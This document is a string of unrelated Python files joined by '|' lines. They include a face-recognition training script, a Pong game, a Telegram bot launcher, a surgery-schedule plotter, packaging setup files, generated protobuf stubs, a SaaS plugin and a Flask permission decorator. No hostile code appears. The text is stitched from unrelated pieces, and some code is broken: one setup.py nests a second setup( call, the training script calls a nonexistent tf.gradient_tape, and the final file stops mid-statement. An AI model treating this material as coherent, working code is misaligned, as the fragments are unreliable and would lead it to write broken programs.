def loss_func(out, label):
lb = tf.convert_to_tensor(label)
out = tf.nn.log_softmax(out, -1)
loss = tf.reduce_sum(tf.reduce_sum(- out * lb , -1)) / BSIZE
return loss
def grad_loss(x, model):
data, label = x
with tf.gradient_tape() as tape:
out = model(data, label)
loss = loss_func(out, label)
acc = M.accuracy(out, label, one_hot=False)
grads = tape.gradient(loss, model.trainable_variables)
return grads, [loss, acc]
def lr_decay(step):
lr = 0.1
step = step/20000
step = tf.math.floor(step)
step = tf.math.pow(0.1, step)
lr = lr * step
return lr
model = network.FaceRecogNet(512,100)
_ = model(np.float32(np.ones([1,128,128,3])), np.float32(np.eye(100)[0]))
vs = model.trainable_variables
for v in vs:
print(v.name)
# t0 = time.time()
# LR = M.LRScheduler(lr_decay)
# print('Label number:', data_reader.max_label+1)
# model = network.FaceRecogNet(512, data_reader.max_label + 1)
# optimizer = tf.optimizers.SGD(LR, 0.9)
# saver = M.Saver(model)
# # saver.restore('./model/')
# _ = model(np.float32(np.ones([1,112,112,3])), np.float32(np.eye(data_reader.max_label+1)[0]))
# accmeter = M.EMAMeter(0.9)
# lossmeter = M.EMAMeter(0.9)
# lsttlmeter = M.EMAMeter(0.9)
# for ep in range(EPOCH):
# for it in range(data_reader.iter_per_epoch):
# batch = data_reader.get_next()
# grad, lsacc = grad_loss(batch, model)
# optimizer.apply_gradients(zip(grad, model.trainable_variables))
# if it%10==0:
# t1 = time.time()
# img_sec = 10 * BSIZE / (t1-t0)
# lsttl = lsacc[0]
# ls = lsacc[1]
# acc = lsacc[2]
# lsttl = lsttlmeter.update(lsttl.numpy())
# ls = lossmeter.update(ls.numpy())
# acc = accmeter.update(acc.numpy())
# t0 = t1
# print('Epoch:%d\tIter:%d\tLoss0:%.6f\tLoss:%.6f\tAcc:%.6f\tSpeed:%.2f'%(ep, it, lsttl, ls, acc, img_sec))
# if it%5000==0 and it>0:
# saver.save('./model/%d_%d.ckpt'%(ep,it))
# t0 = time.time()
# saver.save('./model/%d_%d.ckpt'%(ep,it))
|
"""Implementation of classic arcade game Pong."""
LINK = "http://www.codeskulptor.org/#user47_2HxT8SEaWe_8.py"
import simplegui
import random
# Constants
WIDTH = 600
HEIGHT = 400
BALL_RADIUS = 20
PAD_WIDTH = 8
PAD_LENGTH = 80
PAD_VEL = 4
# helper functions
def add_vec(first_vector, second_vector, dimensions = 2, wrap_frame = False):
""" Adds the second vector to the first vector. If
wrap_frame is True, uses the modular arithmetic """
sum_vector = []
for d in range(dimensions):
if wrap_frame:
sum_vector.append((first_vector[d] + second_vector[d]) % FRAME_SIZE[d])
else:
sum_vector.append(first_vector[d] + second_vector[d])
return sum_vector
def scale_vec(vec, scale = 0.1, dimensions = 2):
""" Performs a scalar multiplication of a vector """
scaled_vector = []
for d in range(dimensions):
scaled_vector.append(vec[d] * scale)
return scaled_vector
def process_group(object_lst, canvas):
""" Draws and updates the position of each object in the list """
for object in object_lst:
object.draw(canvas)
object.update()
# classes
class Ball:
""" Creates a ball object """
def __init__(self, pos, vel, radius):
self.pos = list(pos)
self.vel = list(vel)
self.radius = radius
def __str__(self):
s = "Ball pos " + str(self.pos)
s += ". Ball vel " + str(self.vel)
return s
def get_position(self):
""" Returns the position of the ball """
return self.pos
def get_radius(self):
""" Returns the radius of the ball """
return self.radius
def reflect(self, direction):
""" Reflects the ball horizontally """
if direction == "horizontal":
self.vel[0] = - self.vel[0]
elif direction == "vertical":
self.vel[1] = - self.vel[1]
def accelerate(self):
""" Accelerates the ball """
self.vel = scale_vec(self.vel, scale = 1.1)
def update(self):
""" Moves the ball using its velocity """
self.pos = add_vec(self.pos, self.vel)
def draw(self, canvas):
""" Draws the ball """
canvas.draw_circle(self.pos, self.radius, 1,
"White", "White")
class Paddle:
""" Creates a new paddle, where pos is the
top-left corner """
def __init__(self, pos, width, length):
self.pos = pos
self.width = width
self.length = length
self.vel = [0, 0]
def __str__(self):
s = "Paddle pos " + str(self.pos)
s += ". Paddle vel " + str(self.vel)
return s
def is_collide(self, pos, radius):
""" Returns True if a ball collides with the
paddle, allowing the ball center to be within
half ball radius from the edges of the paddle"""
paddle_top = self.pos[1]
paddle_bottom = self.pos[1] + self.length
if paddle_top - radius / 2 < pos[1] < paddle_bottom + radius / 2:
return True
else:
return False
def update(self):
""" Moves the paddle along the gutters """
if 0 <= add_vec(self.pos, self.vel)[1] <= HEIGHT - PAD_LENGTH:
self.pos = add_vec(self.pos, self.vel)
def set_vel(self, vertical_vel):
""" Sets the velocity of the paddle """
self.vel[1] = vertical_vel
def draw(self, canvas):
""" Draws the paddle """
corners = [self.pos,
[self.pos[0] + self.width, self.pos[1]],
[self.pos[0] + self.width, self.pos[1] + self.length],
[self.pos[0], self.pos[1] + self.length]]
canvas.draw_polygon(corners, 1, "White", "White")
class GameState:
""" Encapsulates all global variables and objects """
def __init__(self):
self.score_1 = 0
self.score_2 = 0
self.spawn_ball(random.choice(["Right", "Left"]))
self.create_paddles()
def get_score(self, num):
""" Gets the score_1 or score_2 """
if num == 1:
return str(self.score_1)
elif num == 2:
return str(self.score_2)
def increment_score(self, num):
""" Increments the score_1 or score_2 """
if num == 1:
self.score_1 += 1
elif num == 2:
self.score_2 += 1
def spawn_ball(self, direction):
""" Spawns a new ball """
global ball
x_vel = random.randrange(2, 4)
y_vel = random.choice([-1, 1]) * random.randrange(1, 3)
if direction == "Left":
x_vel = - x_vel
ball = Ball([WIDTH / 2, HEIGHT / 2],
[x_vel, y_vel ],
BALL_RADIUS)
def create_paddles(self):
""" Creates two paddles """
global paddle_1, paddle_2
paddle_1 = Paddle([0, HEIGHT / 2 - PAD_LENGTH / 2],
PAD_WIDTH, PAD_LENGTH)
paddle_2 = Paddle([WIDTH - PAD_WIDTH, HEIGHT / 2 - PAD_LENGTH / 2],
PAD_WIDTH, PAD_LENGTH)
# event handlers
def keydown(key):
""" Keydown handler """
for move in move_dict:
if key == simplegui.KEY_MAP[move]:
move_dict[move][0].set_vel(move_dict[move][1])
def keyup(key):
""" Keyup handler """
for move in move_dict:
if key == simplegui.KEY_MAP[move]:
move_dict[move][0].set_vel(0)
def draw(canvas):
""" Draws the ball, paddles, and field """
# reflecting the ball
ball_pos = ball.get_position()
ball_radius = ball.get_radius()
if (ball_pos[1] <= 0 + ball_radius) or (
ball_pos[1] >= HEIGHT - ball_radius):
ball.reflect("vertical")
elif ball_pos[0] <= 0 + ball_radius + PAD_WIDTH:
if paddle_1.is_collide(ball_pos, ball_radius):
ball.reflect("horizontal")
ball.accelerate()
else:
game.increment_score(2)
game.spawn_ball("Right")
elif ball_pos[0] >= WIDTH - ball_radius - PAD_WIDTH:
if paddle_2.is_collide(ball_pos, ball_radius):
ball.reflect("horizontal")
ball.accelerate()
else:
game.increment_score(1)
game.spawn_ball("Left")
# drawing and updating ball and paddles
process_group([ball, paddle_1, paddle_2], canvas)
# drawing mid line, gutters and scores
canvas.draw_line([WIDTH / 2, 0],[WIDTH / 2, HEIGHT], 1, "White")
canvas.draw_line([PAD_WIDTH, 0],[PAD_WIDTH, HEIGHT], 1, "White")
canvas.draw_line([WIDTH - PAD_WIDTH, 0],[WIDTH - PAD_WIDTH, HEIGHT], 1, "White")
canvas.draw_text("Player 1: " + game.get_score(1), (25, 25), 36, "White")
canvas.draw_text("Player 2: " + game.get_score(2), (400, 25), 36, "White")
# starting the game
frame = simplegui.create_frame("Pong", WIDTH, HEIGHT)
frame.set_draw_handler(draw)
frame.set_keydown_handler(keydown)
frame.set_keyup_handler(keyup)
game = GameState()
move_dict = {"w" : [paddle_1, - PAD_VEL],
"s" : [paddle_1, PAD_VEL],
"up" : [paddle_2, - PAD_VEL],
"down" : [paddle_2, PAD_VEL]}
frame.start()
|
# -*- coding: utf-8 -*-
# !/usr/bin/env python
# Copyright 2021 zhangt2333. All Rights Reserved.
# Author-Github: github.com/zhangt2333
# main.py 2021/9/13 14:00
import spider
username = "账号"
password = "统一认证密码"
sleep_time = 1.0
if __name__ == '__main__':
spider.main(username, password, sleep_time)
|
import logging
from telegram import ParseMode
from telegram.ext import ExtBot
from telegram.ext import Defaults
from telegram.utils.request import Request
from bot import database
from bot.bot import StickerBot
from bot.utils import log
from config import config as CONFIG
logger = logging.getLogger(__name__)
stickerbot = StickerBot(
bot=ExtBot(
token=CONFIG.TELEGRAM.TOKEN,
defaults=Defaults(parse_mode=ParseMode.HTML, disable_web_page_preview=True),
request=Request(con_pool_size=8)
),
use_context=True
)
def main():
log.load_logging_config('logging.json')
stickerbot.run(drop_pending_updates=True)
|
import plotly.express as px
import pandas as pd
import datetime
class SolutionVisualizer:
def __init__(self):
pass
def print_solution(self, solution):
if(solution is None):
print("No solution was found!")
return
KT = max(solution.keys())
K = KT[0]
T = KT[1]
operatedPatients = 0
for t in range(1, T + 1):
for k in range(1, K + 1):
print("Day: " + str(t) + "; Operating Room: S" + str(k) + "\n")
for patient in solution[(k, t)]:
print(patient)
operatedPatients += 1
print("\n")
print("Total number of operated patients: " + str(operatedPatients))
def plot_graph(self, solution):
if(solution is None):
print("No solution exists to be plotted!")
return
KT = max(solution.keys())
K = KT[0]
T = KT[1]
dataFrames = []
dff = pd.DataFrame([])
for t in range(1, T + 1):
df = pd.DataFrame([])
for k in range(1, K + 1):
patients = solution[(k, t)]
for idx in range(0, len(patients)):
patient = patients[idx]
start = datetime.datetime(1970, 1, t, 8, 0, 0) + datetime.timedelta(minutes=round(patient.order))
finish = start + datetime.timedelta(minutes=round(patient.operatingTime))
room = "S" + str(k)
covid = "Y" if patient.covid == 1 else "N"
anesthesia = "Y" if patient.anesthesia == 1 else "N"
anesthetist = "A" + str(patient.anesthetist) if patient.anesthetist != 0 else ""
dataFrameToAdd = pd.DataFrame([dict(Start=start, Finish=finish, Room=room, Covid=covid, Anesthesia=anesthesia, Anesthetist=anesthetist)])
df = pd.concat([df, dataFrameToAdd])
dataFrames.append(df)
dff = pd.concat([df, dff])
fig = px.timeline(dff,
x_start="Start",
x_end="Finish",
y="Room",
color="Covid",
text="Anesthetist",
labels={"Start": "Surgery start", "Finish": "Surgery end", "Room": "Operating room",
"Covid": "Covid patient", "Anesthesia": "Need for anesthesia", "Anesthetist": "Anesthetist"},
hover_data=["Anesthesia", "Anesthetist"]
)
fig.update_layout(xaxis=dict(title='Timetable', tickformat='%H:%M:%S',))
fig.show()
|
"""
Linear INterpolation Functions.
theta refers to the full set of parameters for an adaptive linear interpolation model,
[n, y0, x1, y1, x2, y2, ..., x_n, y_n, y_n+1],
where n is the greatest allowed value of ceil(n).
The reason for the interleaving of x and y is it avoids the need to know n.
"""
import numpy as np
from linf.helper_functions import (
get_theta_n,
get_x_nodes_from_theta,
get_y_nodes_from_theta,
)
class Linf:
"""
linf with end nodes at x_min and x_max.
x_min: float
x_max: float > x_min
Returns:
linf(x, theta)
theta in format [y0, x1, y1, x2, y2, ..., x_(N-2), y_(N-2), y_(N-1)] for N nodes.
"""
def __init__(self, x_min, x_max):
self.x_min = x_min
self.x_max = x_max
def __call__(self, x, theta):
"""
linf with end nodes at x_min and x_max
theta = [y0, x1, y1, x2, y2, ..., x_(N-2), y_(N-2), y_(N-1)] for N nodes.
y0 and y_(N-1) are the y values corresponding to x_min and x_max respecively.
If theta only contains a single element, the linf is constant at that value.
If theta is empty, the linf if comstant at -1 (cosmology!)
"""
if 0 == len(theta):
return np.full_like(x, -1)
if 1 == len(theta):
return np.full_like(x, theta[-1])
return np.interp(
x,
np.concatenate(
(
[self.x_min],
get_x_nodes_from_theta(theta),
[self.x_max],
)
),
get_y_nodes_from_theta(theta),
)
class AdaptiveLinf(Linf):
"""
Adaptive linf which allows the number of parameters being used to vary.
x_min: float
x_max: float > x_min
Returns:
adaptive_linf(x, theta)
The first element of theta is N; floor(N)-2 is number of interior nodes used in
the linear interpolation model.
theta = [N, y0, x1, y1, x2, y2, ..., x_(Nmax-2), y_(Nmax-2), y_(Nmax-1)],
where Nmax is the greatest allowed value of floor(N).
if floor(N) = 1, the linf is constant at theta[-1] = y_(Nmax-1).
if floor(N) = 0, the linf is constant at -1 (cosmology!)
"""
def __call__(self, x, theta):
"""
The first element of theta is N; floor(N)-2 is number of interior nodes used in
the linear interpolation model. This is then used to select the
appropriate other elements of params to pass to linf()
theta = [N, y0, x1, y1, x2, y2, ..., x_(Nmax-2), y_(Nmax-2), y_(Nmax-1)],
where Nmax is the greatest allowed value of floor(N).
if floor(N) = 1, the linf is constant at theta[-1] = y_(Nmax-1).
if floor(N) = 0, the linf is constant at -1 (cosmology!)
"""
return super().__call__(x, get_theta_n(theta))
|
# Copyright Contributors to the Packit project.
# SPDX-License-Identifier: MIT
import datetime
import dateutil.tz
from specfile.changelog import Changelog, ChangelogEntry
from specfile.sections import Section
def test_parse():
changelog = Changelog.parse(
Section(
"changelog",
[
"* Thu Jan 13 08:12:41 UTC 2022 Nikola Forró <nforro@redhat.com> - 0.2-2",
"- rebuilt",
"",
"* Mon Oct 18 12:34:45 CEST 2021 Nikola Forró <nforro@redhat.com> - 0.2-1",
"- new upstream release",
"",
"* Thu Jul 22 2021 Fedora Release Engineering <releng@fedoraproject.org> - 0.1-2",
"- Rebuilt for https://fedoraproject.org/wiki/Fedora_35_Mass_Rebuild",
"",
"* Tue May 04 2021 Nikola Forró <nforro@redhat.com> - 0.1-1",
"- first version",
" resolves: #999999999",
],
)
)
assert len(changelog) == 4
assert (
changelog[0].header
== "* Tue May 04 2021 Nikola Forró <nforro@redhat.com> - 0.1-1"
)
assert changelog[0].content == ["- first version", " resolves: #999999999"]
assert not changelog[0].extended_timestamp
assert (
changelog[1].header
== "* Thu Jul 22 2021 Fedora Release Engineering <releng@fedoraproject.org> - 0.1-2"
)
assert changelog[1].content == [
"- Rebuilt for https://fedoraproject.org/wiki/Fedora_35_Mass_Rebuild"
]
assert not changelog[1].extended_timestamp
assert (
changelog[2].header
== "* Mon Oct 18 12:34:45 CEST 2021 Nikola Forró <nforro@redhat.com> - 0.2-1"
)
assert changelog[2].content == ["- new upstream release"]
assert changelog[2].extended_timestamp
assert (
changelog[3].header
== "* Thu Jan 13 08:12:41 UTC 2022 Nikola Forró <nforro@redhat.com> - 0.2-2"
)
assert changelog[3].content == ["- rebuilt"]
assert changelog[3].extended_timestamp
def test_get_raw_section_data():
changelog = Changelog(
[
ChangelogEntry.assemble(
datetime.date(2021, 5, 4),
"Nikola Forró <nforro@redhat.com>",
["- first version", " resolves: #999999999"],
"0.1-1",
append_newline=False,
),
ChangelogEntry.assemble(
datetime.date(2021, 7, 22),
"Fedora Release Engineering <releng@fedoraproject.org>",
["- Rebuilt for https://fedoraproject.org/wiki/Fedora_35_Mass_Rebuild"],
"0.1-2",
),
ChangelogEntry.assemble(
datetime.datetime(
2021, 10, 18, 12, 34, 45, tzinfo=dateutil.tz.gettz("CET")
),
"Nikola Forró <nforro@redhat.com>",
["- new upstream release"],
"0.2-1",
),
ChangelogEntry.assemble(
datetime.datetime(2022, 1, 13, 8, 12, 41),
"Nikola Forró <nforro@redhat.com>",
["- rebuilt"],
"0.2-2",
),
]
)
assert changelog.get_raw_section_data() == [
"* Thu Jan 13 08:12:41 UTC 2022 Nikola Forró <nforro@redhat.com> - 0.2-2",
"- rebuilt",
"",
"* Mon Oct 18 12:34:45 CEST 2021 Nikola Forró <nforro@redhat.com> - 0.2-1",
"- new upstream release",
"",
"* Thu Jul 22 2021 Fedora Release Engineering <releng@fedoraproject.org> - 0.1-2",
"- Rebuilt for https://fedoraproject.org/wiki/Fedora_35_Mass_Rebuild",
"",
"* Tue May 04 2021 Nikola Forró <nforro@redhat.com> - 0.1-1",
"- first version",
" resolves: #999999999",
]
|
from typing import Union
import torch.nn as nn
import torch.utils.data
from mighty.trainer.gradient import TrainerGrad
from mighty.utils.common import find_layers
from mighty.utils.data import DataLoader
from torch.optim.lr_scheduler import _LRScheduler, ReduceLROnPlateau
from utils.layers import BinaryDecoratorSoft, binarize_model
class HardnessScheduler:
"""
BinaryDecoratorSoft hardness scheduler.
"""
def __init__(self, model: nn.Module, step_size: int, gamma_hardness=2.0, max_hardness=10):
self.binsoft_layers = tuple(find_layers(model, layer_class=BinaryDecoratorSoft))
self.step_size = step_size
self.gamma_hardness = gamma_hardness
self.max_hardness = max_hardness
self.epoch = 0
def need_update(self):
return self.epoch > 0 and self.epoch % self.step_size == 0
def step(self, epoch: int):
updated = False
if epoch:
self.epoch = epoch
else:
# this function is called just _before_ the completion of an epoch
# in the _epoch_finished() function
self.epoch += 1
if self.need_update():
for layer in self.binsoft_layers:
layer.hardness = min(layer.hardness * self.gamma_hardness, self.max_hardness)
updated = True
return updated
def extra_repr(self):
return f"step_size={self.step_size}," \
f"Hardness(gamma={self.gamma_hardness}," \
f"max={self.max_hardness})"
def __repr__(self):
return f"{self.__class__.__name__}({self.extra_repr()})"
class TrainerGradBinarySoft(TrainerGrad):
def __init__(self, model: nn.Module, criterion: nn.Module, data_loader: DataLoader,
optimizer: torch.optim.Optimizer,
scheduler: Union[_LRScheduler, ReduceLROnPlateau, None] = None,
hardness_scheduler: HardnessScheduler = None,
**kwargs):
model = binarize_model(model, binarizer=BinaryDecoratorSoft)
super().__init__(model, criterion, data_loader=data_loader, optimizer=optimizer, scheduler=scheduler, **kwargs)
self.hardness_scheduler = hardness_scheduler
def monitor_functions(self):
super().monitor_functions()
def hardness(viz):
viz.line_update(y=list(layer.hardness for layer in self.hardness_scheduler.binsoft_layers), opts=dict(
xlabel='Epoch',
ylabel='hardness',
title='BinaryDecoratorSoft tanh hardness',
ytype='log',
))
if self.hardness_scheduler is not None:
self.monitor.register_func(hardness)
def _epoch_finished(self, loss):
super()._epoch_finished(loss)
if self.hardness_scheduler is not None:
self.hardness_scheduler.step()
|
from setuptools import setup
from setuptools import find_packages
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
setup(
VERSION = '0.0.0'
setup(
name='auditdb',
version=VERSION,
description='allow to audit changes of data',
url='https://github.com/affinitas/audit-addon',
author='Claus Koch',
author_email='claus.koch@affinitas.de',
license='MIT',
classifiers=[
'Development Status :: 2 - Pre-Alpha',
'Intended Audience :: Developers',
'Intended Audience :: System Administrators',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3.4',
],
keywords='postgresql audit addon',
packages=find_packages(exclude=['contrib', 'docs', 'tests*']),
)
|
import os
import sys
import random
def read_write_1(infile,ofile):
with open(ofile, 'w') as out_f:
with open(infile,'r',errors='ignore') as in_f:
lines = in_f.readlines()
random.shuffle(lines)
for line in lines:
line_split = line.split(' ', 1)
line = line_split[1].strip() + '\t' + line_split[0].strip()
out_f.write(line + '\n')
def read_write_2(infile,ofile,split):
temp_lst = []
with open(infile,'r',errors='ignore') as in_f:
lines = in_f.readlines()
random.shuffle(lines)
for line in lines:
line_split = line.split(' ', 1)
line = line_split[1].strip() + '\t' + line_split[0].strip()
temp_lst.append(line)
train_data = temp_lst[:split[0]]
dev_data = temp_lst[split[0]:split[1]]
test_data = temp_lst[split[1]:]
head = 'sentence\tlabel'
train_data.insert(0,head)
dev_data.insert(0,head)
test_data.insert(0,head)
name = ['train.tsv','dev.tsv','test.tsv']
val = ['train_data','dev_data','test_data']
for i,n in enumerate(name):
with open(ofile+n,'w') as f:
for line in eval(val[i]):
line = line + '\n'
f.write(str(line))
if __name__ == "__main__":
random.seed(1)
#### SST2
indir = '/home/juncsu/Code/Data/sentiment_dataset/data/'
odir = '/home/juncsu/Code/Data/CapsData/SST-2/'
infiles = [indir + 'stsa.fine.train', indir + 'stsa.fine.dev', indir + 'stsa.fine.test']
ofiles = [odir + 'train.tsv', odir + 'dev.tsv', odir + 'test.tsv']
for i in range(3):
read_write_1(infiles[i], ofiles[i])
#### SST1
indir = '/home/juncsu/Code/Data/sentiment_dataset/data/'
odir = '/home/juncsu/Code/Data/CapsData/SST-1/'
infiles = [indir + 'stsa.binary.train', indir + 'stsa.binary.dev', indir + 'stsa.binary.test']
ofiles = [odir + 'train.tsv', odir + 'dev.tsv', odir + 'test.tsv']
for i in range(3):
read_write_1(infiles[i], ofiles[i])
#### mpqa
split = [8587,9542]
indir = '/home/juncsu/Code/Data/sentiment_dataset/data/'
odir = '/home/juncsu/Code/Data/CapsData/MPQA/'
infile = indir + 'mpqa.all'
read_write_2(infile, odir, split)
## subj
split = [9000,9001]
indir = '/home/juncsu/Code/Data/sentiment_dataset/data/'
odir = '/home/juncsu/Code/Data/CapsData/SUBJ/'
infile = indir + 'subj.all'
read_write_2(infile, odir, split)
|
#!/usr/bin/env python3
import logging
import common
if __name__ == "__main__":
# setup args and logging
args = common.setup_args(domain=common.ArgMod.REQUIRED, llist=common.ArgMod.REQUIRED)
common.setup_logging(args.verbose)
fqdn_listname = "{}@{}".format(args.llist, args.domain)
logging.info("searching for list: {} ...".format(fqdn_listname))
# setup client
client = common.new_client()
# fetch list
llist = common.fetch_list(client, fqdn_listname)
for attr in sorted(llist.settings):
print("{}: {}".format(attr, llist.settings[attr]))
|
from pathlib import Path
from zeep.exceptions import Fault
ROOT_DIR: Path = Path(__file__).parent
CUCM_LATEST_VERSION: str = "14.0"
USERNAME_MAGIC_KEY: str = "73q0eWFaIE2JJw8FMNeX"
URL_MAGIC_KEY: str = "8Cu16DGzNvunSsDNOTrO"
DUMMY_KEY: str = "xlGoVnofkKjNSgnwA9Z7"
DISABLE_SERIALIZER = False
DISABLE_CHECK_TAGS = False
DISABLE_CHECK_ARGS = False
# def turn_off_serializer() -> None:
# global DISABLE_SERIALIZER
# DISABLE_SERIALIZER = True
def turn_off_tags_checker() -> None:
global DISABLE_CHECK_TAGS
DISABLE_CHECK_TAGS = True
def turn_off_args_checker() -> None:
global DISABLE_CHECK_ARGS
DISABLE_CHECK_ARGS = True
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# sources: atomix/value/value.proto
# plugin: python-betterproto
from dataclasses import dataclass
from typing import AsyncGenerator, Optional
import betterproto
from atomix.proto import headers
class EventResponseType(betterproto.Enum):
UPDATED = 0
@dataclass
class CreateRequest(betterproto.Message):
header: headers.RequestHeader = betterproto.message_field(1)
@dataclass
class CreateResponse(betterproto.Message):
header: headers.ResponseHeader = betterproto.message_field(1)
@dataclass
class CloseRequest(betterproto.Message):
header: headers.RequestHeader = betterproto.message_field(1)
delete: bool = betterproto.bool_field(2)
@dataclass
class CloseResponse(betterproto.Message):
header: headers.ResponseHeader = betterproto.message_field(1)
@dataclass
class GetRequest(betterproto.Message):
header: headers.RequestHeader = betterproto.message_field(1)
@dataclass
class GetResponse(betterproto.Message):
header: headers.ResponseHeader = betterproto.message_field(1)
value: bytes = betterproto.bytes_field(2)
version: int = betterproto.uint64_field(3)
@dataclass
class SetRequest(betterproto.Message):
header: headers.RequestHeader = betterproto.message_field(1)
expect_version: int = betterproto.uint64_field(2)
expect_value: bytes = betterproto.bytes_field(3)
value: bytes = betterproto.bytes_field(4)
@dataclass
class SetResponse(betterproto.Message):
header: headers.ResponseHeader = betterproto.message_field(1)
version: int = betterproto.uint64_field(2)
succeeded: bool = betterproto.bool_field(3)
@dataclass
class EventRequest(betterproto.Message):
header: headers.RequestHeader = betterproto.message_field(1)
@dataclass
class EventResponse(betterproto.Message):
header: headers.ResponseHeader = betterproto.message_field(1)
type: "EventResponseType" = betterproto.enum_field(2)
previous_value: bytes = betterproto.bytes_field(3)
previous_version: int = betterproto.uint64_field(4)
new_value: bytes = betterproto.bytes_field(5)
new_version: int = betterproto.uint64_field(6)
class ValueServiceStub(betterproto.ServiceStub):
"""ValueService implements a distributed atomic value"""
async def create(
self, *, header: Optional[headers.RequestHeader] = None
) -> CreateResponse:
"""Create creates a new value session"""
request = CreateRequest()
if header is not None:
request.header = header
return await self._unary_unary(
"/atomix.value.ValueService/Create", request, CreateResponse,
)
async def close(
self, *, header: Optional[headers.RequestHeader] = None, delete: bool = False
) -> CloseResponse:
"""Close closes the value session"""
request = CloseRequest()
if header is not None:
request.header = header
request.delete = delete
return await self._unary_unary(
"/atomix.value.ValueService/Close", request, CloseResponse,
)
async def set(
self,
*,
header: Optional[headers.RequestHeader] = None,
expect_version: int = 0,
expect_value: bytes = b"",
value: bytes = b"",
) -> SetResponse:
"""Set sets the value"""
request = SetRequest()
if header is not None:
request.header = header
request.expect_version = expect_version
request.expect_value = expect_value
request.value = value
return await self._unary_unary(
"/atomix.value.ValueService/Set", request, SetResponse,
)
async def get(
self, *, header: Optional[headers.RequestHeader] = None
) -> GetResponse:
"""Get gets the value"""
request = GetRequest()
if header is not None:
request.header = header
return await self._unary_unary(
"/atomix.value.ValueService/Get", request, GetResponse,
)
async def events(
self, *, header: Optional[headers.RequestHeader] = None
) -> AsyncGenerator[EventResponse, None]:
"""Events listens for value change events"""
request = EventRequest()
if header is not None:
request.header = header
async for response in self._unary_stream(
"/atomix.value.ValueService/Events", request, EventResponse,
):
yield response
|
import importlib
import os
from functools import lru_cache
from urllib.parse import urlparse
from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.utils.translation import ugettext_lazy as _
from orchestra import plugins
from orchestra.contrib.databases.models import Database, DatabaseUser
from orchestra.contrib.orchestration import Operation
from orchestra.contrib.websites.models import Website, WebsiteDirective
from orchestra.utils.apps import isinstalled
from orchestra.utils.functional import cached
from orchestra.utils.python import import_class
from . import helpers
from .. import settings
from ..forms import SaaSPasswordForm
class SoftwareService(plugins.Plugin, metaclass=plugins.PluginMount):
PROTOCOL_MAP = {
'http': (Website.HTTP, (Website.HTTP, Website.HTTP_AND_HTTPS)),
'https': (Website.HTTPS_ONLY, (Website.HTTPS, Website.HTTP_AND_HTTPS, Website.HTTPS_ONLY)),
}
name = None
verbose_name = None
form = SaaSPasswordForm
site_domain = None
has_custom_domain = False
icon = 'orchestra/icons/apps.png'
class_verbose_name = _("Software as a Service")
plugin_field = 'service'
allow_custom_url = False
@classmethod
@lru_cache()
def get_plugins(cls, all=False):
if all:
for module in os.listdir(os.path.dirname(__file__)):
if module not in ('options.py', '__init__.py') and module[-3:] == '.py':
importlib.import_module('.'+module[:-3], __package__)
plugins = super().get_plugins()
else:
plugins = []
for cls in settings.SAAS_ENABLED_SERVICES:
plugins.append(import_class(cls))
return plugins
def get_change_readonly_fields(cls):
fields = super(SoftwareService, cls).get_change_readonly_fields()
return fields + ('name',)
def get_site_domain(self):
context = {
'site_name': self.instance.name,
'name': self.instance.name,
}
return self.site_domain % context
def clean(self):
if self.allow_custom_url:
if self.instance.custom_url:
if isinstalled('orchestra.contrib.websites'):
helpers.clean_custom_url(self)
elif self.instance.custom_url:
raise ValidationError({
'custom_url': _("Custom URL not allowed for this service."),
})
def clean_data(self):
data = super(SoftwareService, self).clean_data()
if not self.instance.pk:
try:
log = Operation.execute_action(self.instance, 'validate_creation')[0]
except IndexError:
pass
else:
if log.state != log.SUCCESS:
raise ValidationError(_("Validate creation execution has failed."))
errors = {}
if 'user-exists' in log.stdout:
errors['name'] = _("User with this username already exists.")
if 'email-exists' in log.stdout:
errors['email'] = _("User with this email address already exists.")
if errors:
raise ValidationError(errors)
return data
def get_directive_name(self):
return '%s-saas' % self.name
def get_directive(self, *args):
if not args:
instance = self.instance
else:
instance = args[0]
url = urlparse(instance.custom_url)
account = instance.account
return WebsiteDirective.objects.get(
name=self.get_directive_name(),
value=url.path,
website__protocol__in=self.PROTOCOL_MAP[url.scheme][1],
website__domains__name=url.netloc,
website__account=account,
)
def get_website(self):
url = urlparse(self.instance.custom_url)
account = self.instance.account
return Website.objects.get(
protocol__in=self.PROTOCOL_MAP[url.scheme][1],
domains__name=url.netloc,
account=account,
directives__name=self.get_directive_name(),
directives__value=url.path,
)
def create_or_update_directive(self):
return helpers.create_or_update_directive(self)
def delete_directive(self):
directive = None
try:
old = type(self.instance).objects.get(pk=self.instance.pk)
if old.custom_url:
directive = self.get_directive(old)
except ObjectDoesNotExist:
return
if directive is not None:
directive.delete()
def save(self):
# pre instance.save()
if isinstalled('orchestra.contrib.websites'):
if self.instance.custom_url:
self.create_or_update_directive()
elif self.instance.pk:
self.delete_directive()
def delete(self):
if isinstalled('orchestra.contrib.websites'):
self.delete_directive()
def get_related(self):
return []
class DBSoftwareService(SoftwareService):
db_name = None
db_user = None
abstract = True
def get_db_name(self):
context = {
'name': self.instance.name,
'site_name': self.instance.name,
}
db_name = self.db_name % context
# Limit for mysql database names
return db_name[:65]
def get_db_user(self):
return self.db_user
@cached
def get_account(self):
account_model = self.instance._meta.get_field('account')
return account_model.remote_field.model.objects.get_main()
def validate(self):
super(DBSoftwareService, self).validate()
create = not self.instance.pk
if create:
account = self.get_account()
# Validated Database
db_user = self.get_db_user()
try:
DatabaseUser.objects.get(username=db_user)
except DatabaseUser.DoesNotExist:
raise ValidationError(
_("Global database user for PHPList '%(db_user)s' does not exists.") % {
'db_user': db_user
}
)
db = Database(name=self.get_db_name(), account=account)
try:
db.full_clean()
except ValidationError as e:
raise ValidationError({
'name': e.messages,
})
def save(self):
super(DBSoftwareService, self).save()
account = self.get_account()
# Database
db_name = self.get_db_name()
db_user = self.get_db_user()
db, db_created = account.databases.get_or_create(name=db_name, type=Database.MYSQL)
user = DatabaseUser.objects.get(username=db_user)
db.users.add(user)
self.instance.database_id = db.pk
|
#!/usr/bin/env python
# coding=utf-8
from functools import wraps
from flask import abort
from flask.ext.login import current_user
from .models import Permission
def permission_required(permission):
def decorator(func):
@wraps(func)
def wrapper(*args, **kwargs):
if not current_user.can(permission):
abort(403)
return func(*args, **kwargs)
return wrapper
return decorator
def admin_required(func):
return permission_required(Permission.ADMIN)(func)
|
import os
import re
from setuptools import find_packages, setup
with open(
os.path.join(os.path.dirname(__file__), 'src', 'apialchemy', '__init__.py')
) as v_file:
VERSION = (
